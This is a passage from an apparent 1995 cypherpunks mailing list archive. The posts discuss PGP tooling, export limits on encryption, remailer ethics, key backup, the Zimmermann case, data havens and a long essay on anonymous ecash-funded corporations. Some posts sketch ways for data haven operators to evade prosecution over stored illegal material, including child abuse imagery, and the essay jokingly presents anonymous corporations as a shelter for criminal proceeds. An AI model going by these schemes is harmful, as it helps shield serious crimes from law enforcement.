However, the version I showed is advanced beyond those sites, most notably in the use of color to highlight various PGP messages, and in the "transparent decryption" feature that I talked about the most. If you'd like to look over this latest version, you can snarf it from: ftp.sgi.com:private/pgp-el.tar.gz This version is still under test and development (notably, I want to get the transparency working for rmail as well as mh-e, and for sending as well as receiving). Because it's not finished yet, I've put it in the private/ directory, which is protected against browsing. When that's all finished, I'll be publishing it again in the usual places. From rishab at dxm.ernet.in Tue Jan 17 14:26:48 1995 From: rishab at dxm.ernet.in (Rishab Aiyer Ghosh) Date: Tue, 17 Jan 95 14:26:48 PST Subject: Jude Milhon in WIRED In-Reply-To: <9501160118.AA05350@snark.imsi.com> Message-ID: "Perry E. Metzger" writes: > rishab at dxm.ernet.in says: > > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter > > member of the cypherpunks - a term that she coined." I didn't even know the > > _was_ a charter. > > Or a Jude Milhon, for that matter. Another example of the continuing > decay of a once proud magazine... Though I don't recall seeing her post to the list, I'll borrow Tim's words from the Cyphernomicon: 2.4.10. "Where did the name 'Cypherpunks' come from?" + Jude Milhon, aka St. Jude, then an editor at "Mondo 2000," was at the earliest meetings...she quipped "You guys are just a bunch of cypherpunks." The name was adopted immediately. 
----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Tue Jan 17 14:26:56 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Tue, 17 Jan 95 14:26:56 PST Subject: Known data havens for pirates? Doubtful Message-ID: I forget who wrote: > blame them. Copyrighted data on a server in a jurisdiction that > doesn't acknowledge the copyrights - a prime use for Data Havens > when they come of age. I suppose you _are_ aware that the US has threatened China with punitive duties on $100 BILLION dollars worth of trade, and that China has started holding some show trials (without shutting down its state-owned CD-piracy factories). It's not going to be easy to find a country more willing and able to ignore international copyright law (Berne Convention etc) than China; however, despite howls of protest even China is likely to knuckle down eventually. What may be likely is distributed piracy markets, such as described in Tim's BlackNet spoof. Read my earlier post on what Lance Rose thinks. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From kipp at warp.mcom.com Tue Jan 17 14:42:53 1995 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Tue, 17 Jan 95 14:42:53 PST Subject: 40bit Encryption : Adequate or sadly lacking ? Message-ID: <9501172240.AA05908@warp.mcom.com> In article <3fh5m0$7tg at hdxu03.telecom.ptt.nl>, you write: > In article , marca at mcom.com > says... > > > >There's no question that 40-bit is less than one would prefer.
> >This is why we are/will be supporting 128-bit RC4, for example, > >in US-only products, honoring United States government export > >restrictions. > > Marc, isn't it possible (legally) to deliver products with a replaceable > encryption library (dll). Delivery with a 40-bit key DLL. The user has > the option to install a dll with a different keysize. Somewhat like > winsock... > > Yes, I've seen the article suggesting a foreign office. I think an open > interface would do good for the whole field. I.e. ftp, telnet, etc. as > well. Actually, it's probably worse than you think: There are govt's out there that won't let you import code that is "encryption ready". You must prove that your software is tamper proof before it can be imported, and tamper proofing means that you can't bolt on security. Also, I believe the export laws disallow "plug in" security in the US... The crypto legal world sucks. From rishab at dxm.ernet.in Tue Jan 17 14:54:15 1995 From: rishab at dxm.ernet.in (Rishab Aiyer Ghosh) Date: Tue, 17 Jan 95 14:54:15 PST Subject: Jude Milhon in WIRED In-Reply-To: <199501160356.TAA09359@netcom2.netcom.com> Message-ID: <5eP9Zc3w165w@dxm.ernet.in> tcmay at netcom.com (Timothy C. May) writes: > > rishab at dxm.ernet.in says: > > > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter > > > member of the cypherpunks - a term that she coined." I didn't even know t > > > _was_ a charter. > > > > Or a Jude Milhon, for that matter. Another example of the continuing > > decay of a once proud magazine... > > I'm not sure what Perry's not having heard of Jude Milhon is supposed > to mean, or how "Wired" interviewing her is "another example of the > continuing decay," etc. I suppose I should have elaborated in my original post. Of course I know of Jude's role in cypherpunk history; in fact I thought it would interest cpunks to know that she was interviewed. As for the 'charter' - it was no doubt WIRED's creative interpretation.
> She's not presently subscribed and hence can't speak up in this > strange matter of how an interview with her implies a magazine is in > decay. Speaking of which, the list membership has hit 640. I'll be posting a membership profile soon, since it's a year since I saw the one that got me out of 'lurk mode' when I discovered I was the only cpunk in this region. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From grendel at netaxs.com Tue Jan 17 15:42:33 1995 From: grendel at netaxs.com (Michael Handler) Date: Tue, 17 Jan 95 15:42:33 PST Subject: Another problem w/Data Havens... In-Reply-To: <9501170829.AA10034@anchor.ho.att.com> Message-ID: On Tue, 17 Jan 1995 wcs at anchor.ho.att.com wrote: > The former case is easy, > if you can rent computer space in a country with a non-meddling > government and good net access (or an easily rentable government :-).) > For those of us in the latter situation, the discussion's still > useful... Point taken. > However, at receipt of the data, it's all in one place, Dave's inbox. > If Alice encrypted it safely, or secret-shared it herself, great! > But if Alice is a narc trying to entrap Dave with plaintext ThoughtCrime, > or Alice's key has been compromised, anything in Dave's inbox is > still toast, even if anything that's been split and stored is safer > than if it had been stored unsplit. So he either needs to split it fast, > shortening the window, or find a way to blind his mail before processing it, > or split it before reading it. I could write a procmail recipe and a script in about an hour to automatically secret-share-split and redistribute the incoming submission. 
If the authorities attempt to indict you for possessing illegal information / kiddie porn / whatnot, they have to prove that you interfered with the automatic redistribution process and examined the contents of the submission. If you in fact did not look at the submission, they would have a difficult time doing so.

--
Michael Handler
Civil Liberty Through Complex Mathematics    Philadelphia, PA
PGP Key ID FC031321    Print: 9B DB 9A B0 1B 0D 56 DA 61 6A 57 AD B2 4C 7B AF
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme

From pstemari at erinet.com Tue Jan 17 15:54:19 1995
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Tue, 17 Jan 95 15:54:19 PST
Subject: Abuse and Remailer Ethics
Message-ID: <9501172343.AB11989@eri.erinet.com>

At 10:27 PM 1/16/95 -0500, Jonathan Rochkind wrote:
> ... So I'm tempted to say "tough luck" to newsgroups that
>don't like receiving anonymous posts. The alternative is for people
>interested to create a moderated newsgroup, where of course the moderator
>could refuse to allow anonymous posts with or without the remailer
>operators cooperation. ...

Another, and less onerous alternative, is to simply stick encrypted reply-to blocks on messages to newsgroups. At that point there's no real difference between the anon post and a post from a system that doesn't provide real name<->userid mappings, and the flames can go straight from the newsgroup to the instigator without involving the remailer op.

    --Paul J. Ste. Marie
      pstemari at well.sf.ca.us, pstemari at erinet.com

From pstemari at erinet.com Tue Jan 17 16:04:13 1995
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Tue, 17 Jan 95 16:04:13 PST
Subject: Does encrypted equal safe?
Message-ID: <9501172355.AA12246@eri.erinet.com>

At 01:28 PM 1/17/95 -0800, Eric Hughes wrote:
> ... Meaning is subjective. If I see encrypted text, am I to be held
>responsible for having seen through an encryption for which I hold not
>the key? Merely because someone knows a transformation into a
>disapproved form does not mean that I do. ...

Which is exactly why the encrypt on receipt or decrypt on delivery ideas won't work. You have to be provably ignorant of the data.

    --Paul J. Ste. Marie
      pstemari at well.sf.ca.us, pstemari at erinet.com

From Ben.Goren at asu.edu Tue Jan 17 16:05:30 1995
From: Ben.Goren at asu.edu (Ben.Goren at asu.edu)
Date: Tue, 17 Jan 95 16:05:30 PST
Subject: Another problem w/Data Havens...
Message-ID:

At 4:43 PM 1/17/95, Paul J. Ste. Marie wrote:
>At 03:29 AM 1/17/95 EST, bill.stewart at pleasantonca.ncr.com +1-510-484-6204
>wrote:
>> ... That way, Dave's system really only has knowledge of the headers,
>>plus one line at a time of incriminating data on the fly. ...
>
>I don't see exactly what that is buying Dave. The entire contents were
>still transmitted to him, so the ability to see the entire file was still
>present, which means he could have, had he chosen to do so, prevented the
>file from residing on his system, and could have screened it. It's
>essentially only the word of the haven op that shows he didn't examine the
>entire file.

That's the main reason why I like my idea of having a trusted encryptor. Nobody's suggested that the current timestamp operators would be in Deep Doo-Doo if they timestamped some piece of thoughtcrime; why should somebody who encrypts be any different?

The service could even be advertised as a different form of timestamping (or notarizing). Not only do you get the file back signed, but you get it back encrypted and signed.

> --Paul J. Ste. Marie
> pstemari at well.sf.ca.us, pstemari at erinet.com

b&

--
Ben.Goren at asu.edu, Arizona State University School of Music
Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059.

From sandfort at crl.com Tue Jan 17 16:57:01 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Tue, 17 Jan 95 16:57:01 PST
Subject: Does encrypted equal safe?
In-Reply-To: <9501172355.AA12246@eri.erinet.com>
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                         SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

> ...
> Which is exactly why the encrypt on receipt or decrypt on delivery ideas
> won't work. You have to be provably ignorant of the data.

In my law school they taught that the burden of proof in a criminal case was on the government.

 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From rrothenb at libws4.ic.sunysb.edu Tue Jan 17 17:03:52 1995
From: rrothenb at libws4.ic.sunysb.edu (Robert Rothenberg)
Date: Tue, 17 Jan 95 17:03:52 PST
Subject: Another problem w/Data Havens...
In-Reply-To:
Message-ID: <9501180103.AA16543@toad.com>

Ben.Goren at asu.edu wrote:
> Doo-Doo if they timestamped some piece of thoughtcrime; why should
> somebody who encrypts be any different?
>
> The service could even be advertised as a different form of timestamping
> (or notarizing). Not only do you get the file back signed, but you get it
> back encrypted and signed.
>

Hmmm.... Of course in some cases one may not want the file to be returned with a signature and timestamp (might be incriminating evidence, depending on what one wants stored and the overall political situation where one is, etc....). Of course that does sound useful.

>
> --
> Ben.Goren at asu.edu, Arizona State University School of Music
> Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059.
>

Rob Finger for public key

From Ben.Goren at asu.edu Tue Jan 17 18:21:28 1995
From: Ben.Goren at asu.edu (Ben.Goren at asu.edu)
Date: Tue, 17 Jan 95 18:21:28 PST
Subject: Another problem w/Data Havens...
Message-ID:

At 6:03 PM 1/17/95, Robert Rothenberg wrote:
>> Doo-Doo if they timestamped some piece of thoughtcrime; why should
>> somebody who encrypts be any different?
>>
>> The service could even be advertised as a different form of timestamping
>> (or notarizing). Not only do you get the file back signed, but you get it
>> back encrypted and signed.
>
>Hmmm.... Of course in some cases one may not want the file to be returned
>with a signature and timestamp (might be incriminating evidence, depending
>on what one wants stored and the overall political situation where one is,
>etc....). Of course that does sound useful.

Just as a notary public does not certify that a given document is truth, but rather that it is what it is and the signature belongs to the person who it appears to belong to, a public timestamp/notary/encryption service on the 'net would certify the existence of that document in that form at that time. No more, no less.

If I recall correctly, a notary can certify a sealed envelope without knowing its contents, by putting a tamper-proof seal on it. Sound familiar? I'll try to find a notary to see if that's the case. If so, we've got as good a precedent as we'll ever find for just about anything.

>Rob Finger for public key

b&

--
Ben.Goren at asu.edu, Arizona State University School of Music
Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059.

From homer at math.cornell.edu Tue Jan 17 18:25:10 1995
From: homer at math.cornell.edu (Homer Wilson Smith)
Date: Tue, 17 Jan 95 18:25:10 PST
Subject: Abuse and Remailer Ethics
In-Reply-To: <9501172343.AB11989@eri.erinet.com>
Message-ID:

This will only work if ALL posts have anonymous reply blocks added, or if the posting only goes through one remailer, as there is no way the first on the chain can know that the end destination is a listserv, no?

Homer

On Tue, 17 Jan 1995, Paul J. Ste. Marie wrote:
> At 10:27 PM 1/16/95 -0500, Jonathan Rochkind wrote:
> > ... So I'm tempted to say "tough luck" to newsgroups that
> >don't like receiving anonymous posts. The alternative is for people
> >interested to create a moderated newsgroup, where of course the moderator
> >could refuse to allow anonymous posts with or without the remailer
> >operators cooperation. ...
>
> Another, and less onerous alternative, is to simply stick encrypted reply-to
> blocks on messages to newsgroups. At that point there's no real difference
> between the anon post and a post from a system that doesn't provide real
> name<->userid mappings, and the flames can go straight from the newsgroup to
> the instigator without involving the remailer op.
>
>
> --Paul J. Ste. Marie
> pstemari at well.sf.ca.us, pstemari at erinet.com
>
>

From homer at math.cornell.edu Tue Jan 17 18:35:45 1995
From: homer at math.cornell.edu (Homer Wilson Smith)
Date: Tue, 17 Jan 95 18:35:45 PST
Subject: Abuse and Remailer Ethics
In-Reply-To: <9501172032.AA29703@cfdevx1.lehman.com>
Message-ID:

The POINT is that if you chain and use pgp the remailer operator CAN'T sell you out. Whether or not the reop discusses or promises never to sell you out is meaningless when the cards are down. Trusting someone because they SAY they are trustable is a fool's game.

So up front, I say "Who me, trustable? Hah!", and then let people use the technology to make sure their stuff is safe.

PGP can't be broken, and chaining can't be traced without LOTS of difficulty, and frankly reops have little interest really in reading people's private mail, especially when it is pgp'd, let alone tracing them for postings that they don't even know what's being said in them! Right?

Homer

On Tue, 17 Jan 1995, Rick Busdiecker wrote:
> Date: Tue, 17 Jan 1995 11:06:16 +0100 (MET)
> From: Mats Bergstrom
>
> This thread illustrates (at least if setups like this are
> worthy of a place in Raph's list) that penet.fi is the safest
> way to go for the moment.
>
> That depends on your threat model. For most, chaining is safer than
> penet.
>
> I would just hate it to have my head on the plate of a remailer
> operator who takes an interest in subtile ethical discussion of
> whether to sell me out or not.
>
> Your characterization of what Homer has said strikes me as extremely
> inaccurate.
>
> Rick
>
>

From stig at hackvan.com Tue Jan 17 19:43:06 1995
From: stig at hackvan.com (Stig)
Date: Tue, 17 Jan 95 19:43:06 PST
Subject: How do I know if its encrypted?
In-Reply-To:
Message-ID:

Eric Hughes wrote:
>
> I'll tell you one really useful facility for offsite storage, and
> that's private key backup. Use a secret sharing arrangement, say 5
> out of 7 reconstruction, and send out 7 chunks. Now, give a different
> pointer-to-chunk to each of 7 different people. In the case of
> catastrophe, you can recover your key.
>

I'll second Eric on the utility of this practice. I should've done this... I lost a new pgp key when my hard disk hit the fan last month. I can't even revoke it...

Stig

FYI: The key to ignore is 0x31F61BA9. The new key is on a server near you.

Key for user ID: Stig
1024-bit key, Key ID 6202A715, created 1995/01/03
Key fingerprint = 58 0C 16 D5 CD 27 EE 37 BB EC 47 73 36 12 9B 96

From rseymour at reed.edu Tue Jan 17 19:49:47 1995
From: rseymour at reed.edu (Robert Seymour)
Date: Tue, 17 Jan 95 19:49:47 PST
Subject: Known data havens for pirates? Doubtful
In-Reply-To:
Message-ID:

In the world according to rishab at dxm.ernet.in:
> I forget who wrote:
> > blame them. Copyrighted data on a server in a jurisdiction that
> > doesn't acknowledge the copyrights - a prime use for Data Havens
> > when they come of age.
> I suppose you _are_ aware that the US has threatened China with punitive
> duties on $100 BILLION dollars worth of trade, and that China has started
> holding some show trials (without shutting down its state-owned CD-piracy
> factories). It's not going to be easy to find a country more willing and
> able to ignore international copyright law (Berne Convention etc) than China;
> however, despite howls of protest even China is likely to knuckle down
> eventually. What may be likely is distributed piracy markets, such as
> described in Tim's BlackNet spoof.
One of the major features of the Uruguay round of the GATT (General Agreement on Tariffs and Trade) is a large revision of international patent and copyright law (which is currently de facto non-existent in many countries). Intellectual copyrights are still somewhat vague in the current agreement, but there will be a course for hearing through the WTO (World Trade Organization). In the case of Asian countries, APEC (Asian Pacific Economic Conference) is laying out intellectual property right regulations for conference members (the US, Canada, and most of the Pacific Rim including China). Though these agreements are still a long way from clearing up copyright disputes and their enforcement remains dubious, they should help to stop such blatant infractions of copyright status.

Of course, one need not look to China for copyright violations, just take a look at all the video tape pirates in New York or other cities ...

|Robert

--
Robert Seymour                    rseymour at reed.edu
Reed College                      Artificial Life Project
NeXTmail, MIME, PGP accepted      WWW Pages

From dcwill at ee.unr.edu Tue Jan 17 21:56:41 1995
From: dcwill at ee.unr.edu (Dr. D.C. Williams)
Date: Tue, 17 Jan 95 21:56:41 PST
Subject: Key backup (was: How do I know . ..)
Message-ID: <199501180601.BAA16566@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

'Stig' was reported to have written:
> Eric Hughes wrote:
> >
> > pointer-to-chunk to each of 7 different people. In the case of
> > catastrophe, you can recover your key.
> >
> I'll second Eric on the utility of this practice. I should've done this...
> I lost a new pgp key when my hard disk hit the fan last month. I can't even
> revoke it...

The "spread spectrum" approach might well be indicated for some life-or-death key security matters, but the vast majority of PGP users probably don't need or want to play Spy vs. Spy with their friends to back up keys. There must be a more reasonable way to back up non-critical keys.
Magnetic media is much more reliable than it used to be, and less reliable than it will soon be, but it's still vulnerable to phenomena such as EMP. Friends are vulnerable to death and disagreements which may end their willingness to participate in the reconstruction of your key.

I recognize that you can't just leave your private keyring lying around indiscriminately (especially if it's labeled "PGP private keyring"), but what's to prevent it from being reproduced in some kind of hard copy form (barcode? ASCII?) on some durable stock (credit card plastic?) and tucked away someplace especially safe? A credit card (postage stamp?) sized flat item is pretty easy to hide, especially if its real function isn't obvious. I guarantee you that I can hide such an object in my home, tell you it's here somewhere, and watch you die of old age before you and a small armada of your henchmen can find it.

If it's still "passphrase-protected", an attacker would a) have to know what to look for, b) have to find it, and c) obtain the passphrase. A "brute force" physical attack (ie: machine seizure and thumbscrews) or TEMPEST-based attack would, IMO, be less effort on the part of the attacker and is therefore the practical limit on private keyring security.

Explanations as to why this would be a Bad Idea are actively solicited.

=D.C. Williams

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxyupioZzwIn1bdtAQErMgGAnlr/g/eLesvcCh9IdXy7RzH2vkKbC/x7
pbm/OA+W7z15ix0PzHOZ/vwpg9X5JBku
=TRHd
-----END PGP SIGNATURE-----

From hfinney at shell.portal.com Tue Jan 17 21:57:08 1995
From: hfinney at shell.portal.com (Hal)
Date: Tue, 17 Jan 95 21:57:08 PST
Subject: EE Times on PRZ
Message-ID: <199501180556.VAA25844@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

The Jan 16 issue of EE Times has an excellent article on the legal controversy surrounding Phil Zimmermann and PGP, positioned top-right front-cover for maximal exposure. It describes the aftermath of a meeting last week between Phil's attorney, Philip Dubois, and the government lawyer handling the case.

"'We told the prosecutor our concerns,' Dubois said. 'He agreed to consider them. We might hear back in a month or two. He didn't make any promises.'"

(Sometimes it seems like the gov't is dragging this case out intentionally. I believe the uncertainty does have a chilling effect on private development of strong crypto, which would be gone if the government announced it was not going to pursue the case, or if they did bring charges and lost.)

Another interesting quote: "Zimmermann is not in danger of being indicted for willfully exporting PGP. Rather, the U.S. attorney's office, here, is considering charging him for making PGP available in such a manner that it could be exported by a third party."

What the hell is this? Can anyone point to the statute they may be referring to here? This seems awfully broad.

This, from a sidebar, is really surprising: "In contrast, public keys allow the overt publication of an encryption key, because decryption keys can only be derived through a mathematically difficult process, such as large prime-number factoring. Contrary to popular belief, the NSA can decrypt public keys of most practical key sizes."

I wonder what this means?
If it is a claim that the NSA can factor 1024 bit moduli that would certainly come as a big surprise. If they are saying that they can do 512 bits that would be more believable although of interest. It is strange that the author would include a statement like this without attribution or evidence.

Generally, the article is very favorable towards Phil and an excellent overview of the case.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLxytnBnMLJtOy9MBAQHGnAH/TAOr6TNchZjCyMESeDdOf1seXTkfMbMY
3qrL91OmjwxDIBDkzszrgizwadKwWYn65yOY3yJ4Wk/xUcNwKFnk1Q==
=PoYj
-----END PGP SIGNATURE-----

From davidm at iconz.co.nz Tue Jan 17 22:06:49 1995
From: davidm at iconz.co.nz (David Murray)
Date: Tue, 17 Jan 95 22:06:49 PST
Subject: Anonymous corporations (a work in progress...)
Message-ID: <199501180604.TAA02052@iconz.co.nz>

0. Introduction

It's been a lucrative month, ecash-wise, what with consulting for some anonymous Mafia don, selling those kiddieporn mpegs and killing that guy who cut Tim May off in the parking lot at the mall. So lucrative, in fact, you don't want those digidollars just sitting around on your hard drive -- you want them to be earning you something.

The answer, of course, is to invest them in an anonymous corporation.

1. The structure of anonymous corporations

1.1 Outline

An anonymous corporation provides an intersection between the real [a term used throughout purely in order to deconstruct it] and digital worlds, a point of contact between the e-economy and the real one.

The corporation itself is known: a genuine Delaware/Bahamas/Cayman Islands etc corporation, able to own property, to make contracts, to sue (and be sued) in the courts and with all the normal rights (and liabilities) of the (corporate) citizen. But the (controlling) investors in the corporation (basically, the stockholders) are anonymous.

The investment comes in from the stockholders in the form of ecash, and is transformed by the company into real money and investments.
Because the investors are anonymous and (assuming) the ecash is untraceable, truly anonymous control of real assets can be exercised.

1.2 Legal structure

The structure has two parts: a corporation and a trustee.

The corporation is just a normal corporation with directors typically supplied by the trustee company that administers the corporation. [Note: the trustee company will need assurance that its fees will be paid, and that its directors are sufficiently indemnified. See below for discussion on whether this is possible under an anonymous structure.]

The corporation issues shares to the trustee. The trustee (typically a trustee company - but a different one to that administering the company) holds the shares on trust for the anonymous beneficiaries.

A beneficiary is defined as a person who, for the time being, holds an eshare in the trust. Each eshare gives the holder the right to direct the trustee on how to vote one of the trustee's shares, the right to receive the dividend income of one of the trustee's shares, the right to receive any distribution due to one of the trustee's shares (eg on the dissolution of the corporation), and the right to participate in the enforcement of duties owed to stockholders. That is, each eshare in the trust mirrors a share in the corporation.

The two part structure isolates the anonymity from the vagaries of corporate law: the register of stockholders of the company will truthfully show the Completely Legitimate Perpetual Trustee Company, Inc (or whatever). It also deals with the classic corporate agency problem (the separation of ownership and control) by allowing the anonymous e-stockholders to enforce their rights against (ie sue) the corporation or its management without breaking cover -- the trustee is bound by its deed to take the necessary action at the (reasonable) behest of the anonymous e-stockholders.

The agency situation is not ideal.
Particularly with regard to ensuring that the *trustee* performs (including the possibility of collusion between directors and trustee), matters of reputation (including the possibility that an e-stockholder is a competitor or a testing agency) will be relevant. (And, of course, there is the possibility that one or more of the e-stockholders is in turn an anonymous corporation, with full rights to sue, and no problem with being unmasked.)

Agency problems can be minimised by restricting the operations of the corporation. Where the corporation merely holds units in a mutual fund, or a piece of real estate, or perhaps even shares in another corporation, the directors' duties will be minimal -- the corporation acting as a conduit only. When the anonymous corporation is undertaking a real business, when management has to be hands on and day to day (ie when there is a greater disparity of information between management and owners) the chances of default by management are probably much greater. Structures could be developed to manage this risk.

Note that the anonymous corporation can have any number of e-stockholders, from one upwards.

1.3 Technical requirements

The establishment of an anonymous corporation has a number of cryptographic requirements:

a) The ready availability of untraceable ecash able to be transformed into real money. This could involve a scheme whereby the ebank was unable to know which edollars had been issued to which customer, followed by anonymous transfer of edollars (ie the bank doesn't know the identity of the transferor or the transferee). That is, some flavor of Chaumian system where double spending is eliminated by on-line settlement of transfers. The ebank would redeem ecash for real dollars. [This, of course, is more of a systemic than a cryptographic requirement.]

b) A method for the anonymous issue/subscription of eshares.

c) A method for the anonymous transfer of eshares (with protections against 'double spending').
These two requirements are essentially a variation on the ecash scheme above.

d) A method for secondary market purchasers of eshares to verify which company the eshare belongs to.

e) A method for the holders of eshares to vote anonymously.

f) A method for distributing dividends etc to e-stockholders. Perhaps the trustee publicly posts an encrypted message. Each eshare acts as a key to decrypt one part of the message, revealing ecash (or, in the case of a bonus issue of stock, or a stock split, or even a merger, eshares etc). If an e-stockholder has more than one share, they will be able to decrypt more than one part (ie each part of the message corresponds to one eshare).

In the case of a widely held corporation, information (accounts, voting forms etc) can be distributed publicly. In the case of closely held corporations (where stockholders are more intimately concerned with management) sensitive information could be encrypted for each e-stockholder.

In order to provide maximum flexibility, an anonymous corporation should be able to issue many millions of eshares. Similarly, an e-stockholder should ideally be able to hold many millions of eshares.

2. Implications

2.1 Implications for the structure

The key (no pun intended) feature of anonymous corporations is, of course, that the stockholders (in the beneficial/equitable sense, ie the e-stockholders) are not known, and cannot be sued. In so far as corporations generally provide limited liability to stockholders anyway, this is not too radical a change (and may deflect some criticism). However, it does have some repercussions.

a) The anonymity of stockholders will deter creditors.

One of the protections that creditors of a corporation have is that if the corporation is unable to pay them, but it has made a payment to the stockholders, the creditors can recover the money paid to the stockholders as a fraudulent conveyance (or similar).
With an anonymous corporation, once a payment has been made to stockholders, it is unrecoverable.

In order to encourage lenders to extend credit, the corporation could offer to secure the loan (with traceable property [ie if the corporation doesn't pay, and deals with the property, the lender can find the property, take it, and sell it to cover the unpaid debt], or by pledge [the corporation leaves the property with the lender, so if the debt isn't paid the lender can sell the property without having to trace it first]). Alternatively, the income stream of the company could be encumbered in such a way that creditors had to be paid out before stockholders. In general, many of the techniques of project financing will be relevant to attracting debt finance.

Trade creditors, especially the directors and the trustee, will also require comfort that their bills will be paid and any liability covered. Some combination of up front payments, insurance and recourse to the assets of the corporation may be enough.

b) The anonymity of stockholders will affect other stockholders

Stockholders sometimes owe duties to other stockholders. In so far as these duties extend to e-stockholders (who hold the equitable, but not the legal title to the shares) they will be effectively unenforceable [except for the possibility of injunctive relief...]. Thus majorities may have more freedom in dealing with minorities [in some situations], possibly leading to a higher premium for control, and insider trading will be undetectable, leading to a more accurate market price for the e-stock (and all other stock).

c) The anonymity of shareholders may be prejudicial

A number of regulatory tests depend upon the identity of (beneficial) shareholders, for example tests of foreign control in investment and tax laws. Anonymous companies may find that the onus is on them to prove that they do not fall into an undesirable category. This will, typically, be impossible.
d) The complexity of the structure has a significant cost

As compared with directly owning an asset, owning an asset via an anonymous corporation is incredibly costly. There are two layers of fees (to directors and to the trustee) and possibly even two layers of tax (at corporation and trust levels) to pay on any income, quite apart from the set up costs and the administration of the technical/cryptographic structure. Then there is the cost in time and effort of monitoring the structure to see that nothing is going wrong (the agency cost). And, of course, e-shares are also likely to be significantly less liquid than ecash or the assets held by the corporation.

And the risk of holding assets via such a structure (default by directors or trustee, discovery by traffic analysis, government confiscation of all anonymous corporations) must be weighed against the risk/return involved in, on the one hand, transforming the ecash into real cash oneself, and, on the other, burying a [heavily encrypted] floppy disk in a coffee tin in the back yard.

2.2 Implications for the e-economy

a) Eregistries

Some elements of the anonymous corporation could be shared across instances, such as directors, trustee and technical/cryptographic structure. This would help to reduce costs (including set-up costs) somewhat. And by separating the cypherpunkish element (crypto-struct) from the more general, and already existing, elements (ie trust companies), it may assist in selling the idea to those pre-existing elements and the investing public [private?].

In other words, just as some corporations use outside services to administer their share registers, eregistries would handle the mechanics of eshares. Eregistries would make the investment in equipment and bandwidth, and charge the issuers of eshares (the trustee) a fee for handling the issue, the online settlement of transfers, the distribution of dividends etc.
Not only does this spread the cost of equipment among corporations, but, if standard service packages are offered by the eregistries, greatly simplifies the drafting of trust deeds [there is only a need to refer to "the services of Cypherpunk eRegistry No1 BV", rather than scary maths].

Such eregistries would need a reputation for reliability, honesty and (perhaps) regulatory inaccessibility. [They might also provide an extra layer of anonymity, acting as a sort of mixer for transactions -- was that message a subscription to that corporation, a transfer of an eshare in this one, or a vote on some matter for the other?] And they need not, of course, be limited to eshares -- eregistries could provide clearing for edebt and ecash.

b) Secured lending -- extending credit to anonyms

Because eshares represent something real, they have real value. A creditor, therefore, should be prepared to lend emoney even to a digital pseudonym on the security of a pledge of eshares [ie eshares transferred to lender on condition that they be transferred back on repayment of loan].

(Another way of leveraging the value of your eportfolio is simply to have your anonymous corporation borrow the money: capitalise up a corporation, have the corporation buy an asset, and have the corporation borrow real money secured on that asset -- the corporation can spend the money or pay it to the e-stockholder (you) as a dividend...)

Enabling anonymous credit unlocks more of the value of ecash.

c) Why not edebt -- ecash by another name

As you will have noticed, I have made certain assumptions about how ecash works [although these assumptions are probably not necessary for the functioning of anonymous corporations]. It is time to make those assumptions more explicit.

I see a system whereby the average person buys ecash over the net (or even off the street), say using their credit card. In return for a (cleared) payment the ebank issues a bucket-o-bits, representing that cash (minus a fee?).
The ebank (via its eregistry) does not know which digital-dollars go to which non-anonymous customer. Transfers of ecash take place anonymously on line (old buckets revoked, new buckets issued). What gives the ecash value is the ebank's promise to turn each edollar into a real dollar (minus a fee?) when presented for payment. This promise is made credible by the ebank's credit rating -- either because it is a bank/financial institution itself, or because it invests the original payments in some very secure instrument (eg t-bills). Ecash, in other words, is just an AA(A) rated no interest debt security issued at face value. [Of course corporations, anonymous and otherwise, could issue other types of edebt -- zero coupon, interest bearing, even convertible into eshares...] This, unfortunately, raises expensive regulatory hurdles for ebanks. Offers of securities to the public of the US (whether by a domestic or foreign ebank) would seem to require compliance with the Securities Act 1933, the Securities Exchange Act 1934, the various requirements of the SEC, and probably state investment laws. As well as the costs of mandated ongoing disclosure, and the setup costs of such a scheme (accountants, investment banks, Wall St lawyers), there are the problems of having to appoint a US indenture trustee (yet another body to convince of the merits of the scheme...) and produce an SEC approved prospectus (anyone for wading through 300 Web pages?). But, of course, these hurdles must be overcome (or bypassed, or even, perhaps, simply ignored) for an anonymous e-economy that is fully integrated into the real economy to develop. Quite apart from the regulations, ebanks structured in this way must face certain facts of economic life. 
A stand-alone ebank (ie one which is not already a bank or other financial institution) will face not only regulatory costs and technical costs (eg eregistries) but also the cost of dealing with the real financial system -- it will cost money to get money from investors (transfer from their account to yours), and to return money to investors (transfer from your account to theirs). To offset these costs, ebanks will receive interest income and fee income.

